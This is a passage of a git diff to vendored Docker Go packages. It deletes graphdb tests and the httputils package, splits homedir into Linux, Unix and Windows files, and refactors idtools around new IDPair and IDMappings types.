t.Fatal(err) - } - - entries := db.List("/webapp", 1) - if len(entries) != 3 { - t.Fatalf("Expect 3 entries for / got %d", len(entries)) - } - - entries = db.List("/webapp", 0) - if len(entries) != 2 { - t.Fatalf("Expect 2 entries for / got %d", len(entries)) - } -} - -func TestAddSelfAsChild(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - child, err := db.Set("/test", "1") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/test/other", child.ID()); err == nil { - t.Fatal("Error should not be nil") - } -} - -func TestAddChildToNonExistentRoot(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - if _, err := db.Set("/myapp", "1"); err != nil { - t.Fatal(err) - } - - if _, err := db.Set("/myapp/proxy/db", "2"); err == nil { - 
t.Fatal("Error should not be nil") - } -} - -func TestWalkAll(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/db/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - if err := db.Walk("/", func(p string, e *Entity) error { - t.Logf("Path: %s Entity: %s", p, e.ID()) - return nil - }, -1); err != nil { - t.Fatal(err) - } -} - -func TestGetEntityByPath(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := 
db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - entity := db.Get("/webapp/db/logs") - if entity == nil { - t.Fatal("Entity should not be nil") - } - if entity.ID() != "4" { - t.Fatalf("Expected to get entity with id 4, got %s", entity.ID()) - } -} - -func TestEnitiesPaths(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - out := db.List("/", -1) - for _, p := range out.Paths() { - t.Log(p) - } -} - -func TestDeleteRootEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - if err := db.Delete("/"); err == nil { - t.Fatal("Error should not be nil") - } -} - -func TestDeleteEntity(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } 
- - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - if err := db.Delete("/webapp/sentry"); err != nil { - t.Fatal(err) - } - entity := db.Get("/webapp/sentry") - if entity != nil { - t.Fatal("Entity /webapp/sentry should be nil") - } -} - -func TestCountRefs(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - if db.Refs("1") != 1 { - t.Fatal("Expect reference count to be 1") - } - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - if db.Refs("2") != 2 { - t.Fatal("Expect reference count to be 2") - } -} - -func TestPurgeId(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - if c := db.Refs("1"); c != 1 { - t.Fatalf("Expect reference count to be 1, got %d", c) - } - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - - count, err := db.Purge("2") - if err != nil { - t.Fatal(err) - } - if count != 2 { - t.Fatalf("Expected 2 references to be removed, got %d", count) - } -} - -// Regression test https://github.com/docker/docker/issues/12334 -func TestPurgeIdRefPaths(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - db.Set("/db", "2") - - db.Set("/db/webapp", "1") - - if c := db.Refs("1"); c != 2 { - t.Fatalf("Expected 2 
reference for webapp, got %d", c) - } - if c := db.Refs("2"); c != 1 { - t.Fatalf("Expected 1 reference for db, got %d", c) - } - - if rp := db.RefPaths("2"); len(rp) != 1 { - t.Fatalf("Expected 1 reference path for db, got %d", len(rp)) - } - - count, err := db.Purge("2") - if err != nil { - t.Fatal(err) - } - - if count != 2 { - t.Fatalf("Expected 2 rows to be removed, got %d", count) - } - - if c := db.Refs("2"); c != 0 { - t.Fatalf("Expected 0 reference for db, got %d", c) - } - if c := db.Refs("1"); c != 1 { - t.Fatalf("Expected 1 reference for webapp, got %d", c) - } -} - -func TestRename(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - if db.Refs("1") != 1 { - t.Fatal("Expect reference count to be 1") - } - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - - if db.Get("/webapp/db") == nil { - t.Fatal("Cannot find entity at path /webapp/db") - } - - if err := db.Rename("/webapp/db", "/webapp/newdb"); err != nil { - t.Fatal(err) - } - if db.Get("/webapp/db") != nil { - t.Fatal("Entity should not exist at /webapp/db") - } - if db.Get("/webapp/newdb") == nil { - t.Fatal("Cannot find entity at path /webapp/newdb") - } - -} - -func TestCreateMultipleNames(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/db", "1") - if _, err := db.Set("/myapp", "1"); err != nil { - t.Fatal(err) - } - - db.Walk("/", func(p string, e *Entity) error { - t.Logf("%s\n", p) - return nil - }, -1) -} - -func TestRefPaths(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - - refs := db.RefPaths("2") - if len(refs) != 2 { - t.Fatalf("Expected reference count to be 2, got %d", 
len(refs)) - } -} - -func TestExistsTrue(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/testing", "1") - - if !db.Exists("/testing") { - t.Fatalf("/tesing should exist") - } -} - -func TestExistsFalse(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/toerhe", "1") - - if db.Exists("/testing") { - t.Fatalf("/tesing should not exist") - } - -} - -func TestGetNameWithTrailingSlash(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/todo", "1") - - e := db.Get("/todo/") - if e == nil { - t.Fatalf("Entity should not be nil") - } -} - -func TestConcurrentWrites(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - errs := make(chan error, 2) - - save := func(name string, id string) { - if _, err := db.Set(fmt.Sprintf("/%s", name), id); err != nil { - errs <- err - } - errs <- nil - } - purge := func(id string) { - if _, err := db.Purge(id); err != nil { - errs <- err - } - errs <- nil - } - - save("/1", "1") - - go purge("1") - go save("/2", "2") - - any := false - for i := 0; i < 2; i++ { - if err := <-errs; err != nil { - any = true - t.Log(err) - } - } - if any { - t.Fail() - } -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go deleted file mode 100644 index c07df077d8..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go +++ /dev/null @@ -1,27 +0,0 @@ -package graphdb - -import "sort" - -type pathSorter struct { - paths []string - by func(i, j string) bool -} - -func sortByDepth(paths []string) { - s := &pathSorter{paths, func(i, j string) bool { - return PathDepth(i) > PathDepth(j) - }} - sort.Sort(s) -} - -func 
(s *pathSorter) Len() int { - return len(s.paths) -} - -func (s *pathSorter) Swap(i, j int) { - s.paths[i], s.paths[j] = s.paths[j], s.paths[i] -} - -func (s *pathSorter) Less(i, j int) bool { - return s.by(s.paths[i], s.paths[j]) -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go deleted file mode 100644 index ddf2266f60..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go +++ /dev/null @@ -1,29 +0,0 @@ -package graphdb - -import ( - "testing" -) - -func TestSort(t *testing.T) { - paths := []string{ - "/", - "/myreallylongname", - "/app/db", - } - - sortByDepth(paths) - - if len(paths) != 3 { - t.Fatalf("Expected 3 parts got %d", len(paths)) - } - - if paths[0] != "/app/db" { - t.Fatalf("Expected /app/db got %s", paths[0]) - } - if paths[1] != "/myreallylongname" { - t.Fatalf("Expected /myreallylongname got %s", paths[1]) - } - if paths[2] != "/" { - t.Fatalf("Expected / got %s", paths[2]) - } -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go deleted file mode 100644 index 2b8ba71724..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go +++ /dev/null @@ -1,3 +0,0 @@ -// +build !cgo !linux - -package graphdb diff --git a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go deleted file mode 100644 index 9edd79c35e..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go +++ /dev/null @@ -1,32 +0,0 @@ -package graphdb - -import ( - "path" - "strings" -) - -// Split p on / -func split(p string) []string { - return strings.Split(p, "/") -} - -// PathDepth returns the depth or number of / in a given path -func PathDepth(p string) int { - parts := split(p) - if len(parts) == 2 && parts[1] == "" { - return 1 - } - return len(parts) -} - -func splitPath(p 
string) (parent, name string) { - if p[0] != '/' { - p = "/" + p - } - parent, name = path.Split(p) - l := len(parent) - if parent[l-1] == '/' { - parent = parent[:l-1] - } - return -} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go new file mode 100644 index 0000000000..ee15ed52b1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go @@ -0,0 +1,21 @@ +package homedir // import "github.com/docker/docker/pkg/homedir" + +import ( + "os" + + "github.com/docker/docker/pkg/idtools" +) + +// GetStatic returns the home directory for the current user without calling +// os/user.Current(). This is useful for static-linked binary on glibc-based +// system, because a call to os/user.Current() in a static binary leads to +// segfault due to a glibc issue that won't be fixed in a short term. +// (#29344, golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341) +func GetStatic() (string, error) { + uid := os.Getuid() + usr, err := idtools.LookupUID(uid) + if err != nil { + return "", err + } + return usr.Home, nil +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go new file mode 100644 index 0000000000..75ada2fe54 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go @@ -0,0 +1,13 @@ +// +build !linux + +package homedir // import "github.com/docker/docker/pkg/homedir" + +import ( + "errors" +) + +// GetStatic is not needed for non-linux systems. +// (Precisely, it is needed only for glibc-based linux systems.) 
+func GetStatic() (string, error) { + return "", errors.New("homedir.GetStatic() is not supported on this system") +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go index 7a95cb2bd7..49c42224fd 100644 --- a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go @@ -1,4 +1,4 @@ -package homedir +package homedir // import "github.com/docker/docker/pkg/homedir" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go similarity index 75% rename from vendor/github.com/docker/docker/pkg/homedir/homedir.go rename to vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go index 8154e83f0c..d85e124488 100644 --- a/vendor/github.com/docker/docker/pkg/homedir/homedir.go +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go @@ -1,8 +1,9 @@ -package homedir +// +build !windows + +package homedir // import "github.com/docker/docker/pkg/homedir" import ( "os" - "runtime" "github.com/opencontainers/runc/libcontainer/user" ) @@ -10,9 +11,6 @@ import ( // Key returns the env var name for the user's home dir based on // the platform being run on func Key() string { - if runtime.GOOS == "windows" { - return "USERPROFILE" - } return "HOME" } @@ -21,7 +19,7 @@ func Key() string { // Returned path should be used with "path/filepath" to form new paths. func Get() string { home := os.Getenv(Key()) - if home == "" && runtime.GOOS != "windows" { + if home == "" { if u, err := user.CurrentUser(); err == nil { return u.Home } @@ -32,8 +30,5 @@ func Get() string { // GetShortcutString returns the string that is shortcut to user's home directory // in the native shell of the platform running on. 
func GetShortcutString() string { - if runtime.GOOS == "windows" { - return "%USERPROFILE%" // be careful while using in format functions - } return "~" } diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go new file mode 100644 index 0000000000..2f81813b28 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go @@ -0,0 +1,24 @@ +package homedir // import "github.com/docker/docker/pkg/homedir" + +import ( + "os" +) + +// Key returns the env var name for the user's home dir based on +// the platform being run on +func Key() string { + return "USERPROFILE" +} + +// Get returns the home directory of the current user with the help of +// environment variables depending on the target operating system. +// Returned path should be used with "path/filepath" to form new paths. +func Get() string { + return os.Getenv(Key()) +} + +// GetShortcutString returns the string that is shortcut to user's home directory +// in the native shell of the platform running on. +func GetShortcutString() string { + return "%USERPROFILE%" // be careful while using in format functions +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils.go b/vendor/github.com/docker/docker/pkg/httputils/httputils.go deleted file mode 100644 index d7dc43877d..0000000000 --- a/vendor/github.com/docker/docker/pkg/httputils/httputils.go +++ /dev/null @@ -1,56 +0,0 @@ -package httputils - -import ( - "errors" - "fmt" - "net/http" - "regexp" - "strings" - - "github.com/docker/docker/pkg/jsonmessage" -) - -var ( - headerRegexp = regexp.MustCompile(`^(?:(.+)/(.+?))\((.+)\).*$`) - errInvalidHeader = errors.New("Bad header, should be in format `docker/version (platform)`") -) - -// Download requests a given URL and returns an io.Reader. 
-func Download(url string) (resp *http.Response, err error) { - if resp, err = http.Get(url); err != nil { - return nil, err - } - if resp.StatusCode >= 400 { - return nil, fmt.Errorf("Got HTTP status code >= 400: %s", resp.Status) - } - return resp, nil -} - -// NewHTTPRequestError returns a JSON response error. -func NewHTTPRequestError(msg string, res *http.Response) error { - return &jsonmessage.JSONError{ - Message: msg, - Code: res.StatusCode, - } -} - -// ServerHeader contains the server information. -type ServerHeader struct { - App string // docker - Ver string // 1.8.0-dev - OS string // windows or linux -} - -// ParseServerHeader extracts pieces from an HTTP server header -// which is in the format "docker/version (os)" eg docker/1.8.0-dev (windows). -func ParseServerHeader(hdr string) (*ServerHeader, error) { - matches := headerRegexp.FindStringSubmatch(hdr) - if len(matches) != 4 { - return nil, errInvalidHeader - } - return &ServerHeader{ - App: strings.TrimSpace(matches[1]), - Ver: strings.TrimSpace(matches[2]), - OS: strings.TrimSpace(matches[3]), - }, nil -} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go deleted file mode 100644 index d35d082156..0000000000 --- a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go +++ /dev/null @@ -1,115 +0,0 @@ -package httputils - -import ( - "fmt" - "io/ioutil" - "net/http" - "net/http/httptest" - "strings" - "testing" -) - -func TestDownload(t *testing.T) { - expected := "Hello, docker !" 
- ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - fmt.Fprintf(w, expected) - })) - defer ts.Close() - response, err := Download(ts.URL) - if err != nil { - t.Fatal(err) - } - - actual, err := ioutil.ReadAll(response.Body) - response.Body.Close() - - if err != nil || string(actual) != expected { - t.Fatalf("Expected the response %q, got err:%v, response:%v, actual:%s", expected, err, response, string(actual)) - } -} - -func TestDownload400Errors(t *testing.T) { - expectedError := "Got HTTP status code >= 400: 403 Forbidden" - ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - // 403 - http.Error(w, "something failed (forbidden)", http.StatusForbidden) - })) - defer ts.Close() - // Expected status code = 403 - if _, err := Download(ts.URL); err == nil || err.Error() != expectedError { - t.Fatalf("Expected the the error %q, got %v", expectedError, err) - } -} - -func TestDownloadOtherErrors(t *testing.T) { - if _, err := Download("I'm not an url.."); err == nil || !strings.Contains(err.Error(), "unsupported protocol scheme") { - t.Fatalf("Expected an error with 'unsupported protocol scheme', got %v", err) - } -} - -func TestNewHTTPRequestError(t *testing.T) { - errorMessage := "Some error message" - ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - // 403 - http.Error(w, errorMessage, http.StatusForbidden) - })) - defer ts.Close() - httpResponse, err := http.Get(ts.URL) - if err != nil { - t.Fatal(err) - } - if err := NewHTTPRequestError(errorMessage, httpResponse); err.Error() != errorMessage { - t.Fatalf("Expected err to be %q, got %v", errorMessage, err) - } -} - -func TestParseServerHeader(t *testing.T) { - inputs := map[string][]string{ - "bad header": {"error"}, - "(bad header)": {"error"}, - "(without/spaces)": {"error"}, - "(header/with spaces)": {"error"}, - "foo/bar (baz)": {"foo", "bar", "baz"}, - "foo/bar": {"error"}, - "foo": 
{"error"}, - "foo/bar (baz space)": {"foo", "bar", "baz space"}, - " f f / b b ( b s ) ": {"f f", "b b", "b s"}, - "foo/bar (baz) ignore": {"foo", "bar", "baz"}, - "foo/bar ()": {"error"}, - "foo/bar()": {"error"}, - "foo/bar(baz)": {"foo", "bar", "baz"}, - "foo/bar/zzz(baz)": {"foo/bar", "zzz", "baz"}, - "foo/bar(baz/abc)": {"foo", "bar", "baz/abc"}, - "foo/bar(baz (abc))": {"foo", "bar", "baz (abc)"}, - } - - for header, values := range inputs { - serverHeader, err := ParseServerHeader(header) - if err != nil { - if err != errInvalidHeader { - t.Fatalf("Failed to parse %q, and got some unexpected error: %q", header, err) - } - if values[0] == "error" { - continue - } - t.Fatalf("Header %q failed to parse when it shouldn't have", header) - } - if values[0] == "error" { - t.Fatalf("Header %q parsed ok when it should have failed(%q).", header, serverHeader) - } - - if serverHeader.App != values[0] { - t.Fatalf("Expected serverHeader.App for %q to equal %q, got %q", header, values[0], serverHeader.App) - } - - if serverHeader.Ver != values[1] { - t.Fatalf("Expected serverHeader.Ver for %q to equal %q, got %q", header, values[1], serverHeader.Ver) - } - - if serverHeader.OS != values[2] { - t.Fatalf("Expected serverHeader.OS for %q to equal %q, got %q", header, values[2], serverHeader.OS) - } - - } - -} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go deleted file mode 100644 index 9de433ee8c..0000000000 --- a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go +++ /dev/null @@ -1,13 +0,0 @@ -package httputils - -import ( - "testing" -) - -func TestDetectContentType(t *testing.T) { - input := []byte("That is just a plain text") - - if contentType, _, err := DetectContentType(input); err != nil || contentType != "text/plain" { - t.Errorf("TestDetectContentType failed") - } -} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools.go 
b/vendor/github.com/docker/docker/pkg/idtools/idtools.go index 6bca466286..d1f173a311 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools.go @@ -1,4 +1,4 @@ -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "bufio" @@ -30,56 +30,50 @@ func (e ranges) Swap(i, j int) { e[i], e[j] = e[j], e[i] } func (e ranges) Less(i, j int) bool { return e[i].Start < e[j].Start } const ( - subuidFileName string = "/etc/subuid" - subgidFileName string = "/etc/subgid" + subuidFileName = "/etc/subuid" + subgidFileName = "/etc/subgid" ) -// MkdirAllAs creates a directory (include any along the path) and then modifies +// MkdirAllAndChown creates a directory (include any along the path) and then modifies // ownership to the requested uid/gid. If the directory already exists, this // function will still change ownership to the requested uid/gid pair. -func MkdirAllAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { - return mkdirAs(path, mode, ownerUID, ownerGID, true, true) +func MkdirAllAndChown(path string, mode os.FileMode, owner IDPair) error { + return mkdirAs(path, mode, owner.UID, owner.GID, true, true) } -// MkdirAllNewAs creates a directory (include any along the path) and then modifies -// ownership ONLY of newly created directories to the requested uid/gid. If the -// directories along the path exist, no change of ownership will be performed -func MkdirAllNewAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { - return mkdirAs(path, mode, ownerUID, ownerGID, true, false) +// MkdirAndChown creates a directory and then modifies ownership to the requested uid/gid. +// If the directory already exists, this function still changes ownership. +// Note that unlike os.Mkdir(), this function does not return IsExist error +// in case path already exists. 
+func MkdirAndChown(path string, mode os.FileMode, owner IDPair) error { + return mkdirAs(path, mode, owner.UID, owner.GID, false, true) } -// MkdirAs creates a directory and then modifies ownership to the requested uid/gid. -// If the directory already exists, this function still changes ownership -func MkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { - return mkdirAs(path, mode, ownerUID, ownerGID, false, true) +// MkdirAllAndChownNew creates a directory (include any along the path) and then modifies +// ownership ONLY of newly created directories to the requested uid/gid. If the +// directories along the path exist, no change of ownership will be performed +func MkdirAllAndChownNew(path string, mode os.FileMode, owner IDPair) error { + return mkdirAs(path, mode, owner.UID, owner.GID, true, false) } // GetRootUIDGID retrieves the remapped root uid/gid pair from the set of maps. // If the maps are empty, then the root uid/gid will default to "real" 0/0 func GetRootUIDGID(uidMap, gidMap []IDMap) (int, int, error) { - var uid, gid int - - if uidMap != nil { - xUID, err := ToHost(0, uidMap) - if err != nil { - return -1, -1, err - } - uid = xUID + uid, err := toHost(0, uidMap) + if err != nil { + return -1, -1, err } - if gidMap != nil { - xGID, err := ToHost(0, gidMap) - if err != nil { - return -1, -1, err - } - gid = xGID + gid, err := toHost(0, gidMap) + if err != nil { + return -1, -1, err } return uid, gid, nil } -// ToContainer takes an id mapping, and uses it to translate a +// toContainer takes an id mapping, and uses it to translate a // host ID to the remapped ID. 
If no map is provided, then the translation // assumes a 1-to-1 mapping and returns the passed in id -func ToContainer(hostID int, idMap []IDMap) (int, error) { +func toContainer(hostID int, idMap []IDMap) (int, error) { if idMap == nil { return hostID, nil } @@ -92,10 +86,10 @@ func ToContainer(hostID int, idMap []IDMap) (int, error) { return -1, fmt.Errorf("Host ID %d cannot be mapped to a container ID", hostID) } -// ToHost takes an id mapping and a remapped ID, and translates the +// toHost takes an id mapping and a remapped ID, and translates the // ID to the mapped host ID. If no map is provided, then the translation // assumes a 1-to-1 mapping and returns the passed in id # -func ToHost(contID int, idMap []IDMap) (int, error) { +func toHost(contID int, idMap []IDMap) (int, error) { if idMap == nil { return contID, nil } @@ -108,26 +102,101 @@ func ToHost(contID int, idMap []IDMap) (int, error) { return -1, fmt.Errorf("Container ID %d cannot be mapped to a host ID", contID) } -// CreateIDMappings takes a requested user and group name and +// IDPair is a UID and GID pair +type IDPair struct { + UID int + GID int +} + +// IDMappings contains a mappings of UIDs and GIDs +type IDMappings struct { + uids []IDMap + gids []IDMap +} + +// NewIDMappings takes a requested user and group name and // using the data from /etc/sub{uid,gid} ranges, creates the // proper uid and gid remapping ranges for that user/group pair -func CreateIDMappings(username, groupname string) ([]IDMap, []IDMap, error) { +func NewIDMappings(username, groupname string) (*IDMappings, error) { subuidRanges, err := parseSubuid(username) if err != nil { - return nil, nil, err + return nil, err } subgidRanges, err := parseSubgid(groupname) if err != nil { - return nil, nil, err + return nil, err } if len(subuidRanges) == 0 { - return nil, nil, fmt.Errorf("No subuid ranges found for user %q", username) + return nil, fmt.Errorf("No subuid ranges found for user %q", username) } if len(subgidRanges) == 0 
{ - return nil, nil, fmt.Errorf("No subgid ranges found for group %q", groupname) + return nil, fmt.Errorf("No subgid ranges found for group %q", groupname) } - return createIDMap(subuidRanges), createIDMap(subgidRanges), nil + return &IDMappings{ + uids: createIDMap(subuidRanges), + gids: createIDMap(subgidRanges), + }, nil +} + +// NewIDMappingsFromMaps creates a new mapping from two slices +// Deprecated: this is a temporary shim while transitioning to IDMapping +func NewIDMappingsFromMaps(uids []IDMap, gids []IDMap) *IDMappings { + return &IDMappings{uids: uids, gids: gids} +} + +// RootPair returns a uid and gid pair for the root user. The error is ignored +// because a root user always exists, and the defaults are correct when the uid +// and gid maps are empty. +func (i *IDMappings) RootPair() IDPair { + uid, gid, _ := GetRootUIDGID(i.uids, i.gids) + return IDPair{UID: uid, GID: gid} +} + +// ToHost returns the host UID and GID for the container uid, gid. +// Remapping is only performed if the ids aren't already the remapped root ids +func (i *IDMappings) ToHost(pair IDPair) (IDPair, error) { + var err error + target := i.RootPair() + + if pair.UID != target.UID { + target.UID, err = toHost(pair.UID, i.uids) + if err != nil { + return target, err + } + } + + if pair.GID != target.GID { + target.GID, err = toHost(pair.GID, i.gids) + } + return target, err +} + +// ToContainer returns the container UID and GID for the host uid and gid +func (i *IDMappings) ToContainer(pair IDPair) (int, int, error) { + uid, err := toContainer(pair.UID, i.uids) + if err != nil { + return -1, -1, err + } + gid, err := toContainer(pair.GID, i.gids) + return uid, gid, err +} + +// Empty returns true if there are no id mappings +func (i *IDMappings) Empty() bool { + return len(i.uids) == 0 && len(i.gids) == 0 +} + +// UIDs return the UID mapping +// TODO: remove this once everything has been refactored to use pairs +func (i *IDMappings) UIDs() []IDMap { + return i.uids +} + +// 
GIDs return the UID mapping +// TODO: remove this once everything has been refactored to use pairs +func (i *IDMappings) GIDs() []IDMap { + return i.gids } func createIDMap(subidRanges ranges) []IDMap { diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go index f9eb31c3ec..1d87ea3bcb 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go @@ -1,6 +1,6 @@ // +build !windows -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "bytes" @@ -10,6 +10,7 @@ import ( "path/filepath" "strings" "sync" + "syscall" "github.com/docker/docker/pkg/system" "github.com/opencontainers/runc/libcontainer/user" @@ -26,17 +27,22 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // so that we can chown all of them properly at the end. If chownExisting is false, we won't // chown the full directory path if it exists var paths []string - if _, err := os.Stat(path); err != nil && os.IsNotExist(err) { - paths = []string{path} - } else if err == nil && chownExisting { - if err := os.Chown(path, 